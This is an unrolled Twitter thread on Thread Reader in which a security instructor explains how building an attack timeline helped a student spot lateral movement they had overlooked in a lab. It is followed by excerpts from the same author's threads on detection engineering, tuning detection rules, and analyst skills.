Let's talk about some lessons gathered from how a student over the weekend quickly went from struggling on an investigation lab and...

"I'm stuck"

to finished and...

"I don’t know if you just Yoda’d the hell out of me or what"

1/x
This particular student emailed and said they were stuck and gave me some misc facts they had discovered. I responded and asked them to lay out a timeline of what they knew already so that we could work together to spot the gaps. 2/
The truth is that when this inquiry is taken seriously, it doesn't often result in us having to spot those gaps together at all because the student figures it out on their own. Why does this happen? Two main reasons... 3/
First, when forced to revisit an investigation and build an actual timeline, analysts notice gaps to pursue or things that they missed. 4/
I can't stress how important this skill is. I've seen it over and over again in my empirical research of highly skilled analysts. Experts constantly revisit what they've found and conceptualize it all on a timeline. 5/
Analysts with lots of working memory capacity can sometimes do this in their heads, while those with lower WM capacity are more likely to write it down. The complexity of the attack also plays a factor here as well. 6/
Every new significant piece of information an analyst discovers means processing its meaning... on its own, in relation to the entities and relationships around it, and in relationship to the broader attack timeline. 7/
Second, when jumping into evidence without an explicit purpose, analysts are more likely to miss things. In this case, the analyst had looked at authentication logs many times but skipped right over the service account being used for lateral movement from an infected host. 8/
Investigations don't always reveal things in the order they happened. When you revisit things in a timeline, it's easier to connect the meaning between events. You're more likely to understand the significance of an evidence source and what is potentially there. 9/
For this analyst, they had mostly stumbled into auth logs in the first place. When they revisited the attack timeline while knowing where they were in it, the lateral movement stood out more. 10/
So here, it's all about the lens through which you view evidentiary data. As your lens shifts, viewing the same data can reveal new things. It's how experts operate and how inexperienced analysts learn. 11/
So... Jedi mind trick? No. But, when you stop to think back through the timeline of events, gaps and connections are more easily revealed. 12/12

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Chris Sanders 🍯

Chris Sanders 🍯 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @chrissanders88

19 Aug
One of the things I absolutely love about our new @sigma_hq course is that a final challenges includes building your own new rule (we provide a bunch of ideas) with the option of actually submitting it to the public repo. Folks learn and contribute community detection value.
@sigma_hq As part of that, @DefensiveDepth walks students through the process, even if they've never used git before. The Sigma community also does a great job of providing input and additional testing.
It's awesome to watch it all come together. I'm looking at a rule in the public repo now written by a student who didn't know anything about Sigma a month ago. It's been tested, vetted, and now it'll help folks find some evil.
Read 4 tweets
18 Aug
I don't know who needs to hear this today but cyber security work is really hard. Even at the entry level, it's difficult work.

People around you too easily forget that because of the curse of knowledge -- we can't remember what it was like to not know something we know.
Prevalence of incomplete information, lots of inputs, tons of tacit knowledge, an ill-defined domain, high working memory demands, poor tooling and UX, lack of best practices, interpersonal challenges... I could go on. It's really hard.
Even if everybody around you seems to make it look easy -- it isn't. This stuff is complex, difficult, and mentally demanding.
Read 4 tweets
21 Jul
One of the more helpful things new analysts can do is to read about different sorts of attacks and understand the timeline of events that occurred in them. This enables something called forecasting, which is an essential skill. Let's talk about that. 1/
Any alert or finding that launches an investigation represents a point on a potential attack timeline. That timeline already exists, but the analyst has to discover its remaining elements to decide if it's malicious and if action should be taken. 2/
Good analysts look at an event and consider what sort of other events could have led to it or followed it that would help them make a judgement about the sequences disposition. 3/
Read 20 tweets
24 Jun
While we're doing a Detection Engineering AMA, how do you build these sorta skills if you want to do that job for a living? Big question, but I'd focus on three areas for early career folks...
Investigative Experience -- Tuning detection involves investigating alerts from signatures so you need to be able to do that at some level. A year or two of SOC experience is a good way to start.
Detection Syntax -- You have to be able to express detection logic. Suricata for network traffic, Sigma for logs, YARA for files. Learn those and you can detect a lot of evil. They translate well to vendor-specific stuff.
Read 8 tweets
24 Jun
This relates to my 4th and 5th reasons why these decisions happen -- AV company tactics and giving folks what they need to tune rules. That actually means GIVING analysts the rule logic. I could go on and on about this.
Most companies don't want to give out their rule logic because they see it as a sensitive trade secret. This is nonsense. A rule set isn't a detection companies most valuable intellectual property, it's their processes for creating those rules and the staff that do the work.
Limiting access to detection logic makes it harder for your customer. It is MUCH more difficult to investigate alerts when you don't know what they are actually detecting and how they're doing it.
Read 9 tweets
24 Jun
I usually see two things.

1. Analysts don't have the skills to perform tuning.

2. Management won't prioritize time for it or train analysts to do it.

I rarely see #2 get rectified until new management comes in who understands the importance of tuning.
I've seen many good analysts give clear, compelling explanations as to why tuning is important but fail to convince the decision-makers that this needs a dedicated person or a day a week from an existing person.
The thing that needs to become more commonly accepted is that if you decide your company needs a SOC, then that has to include a detection tuning capability. It also needs to be run by people who've seen this thing work well.
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

:(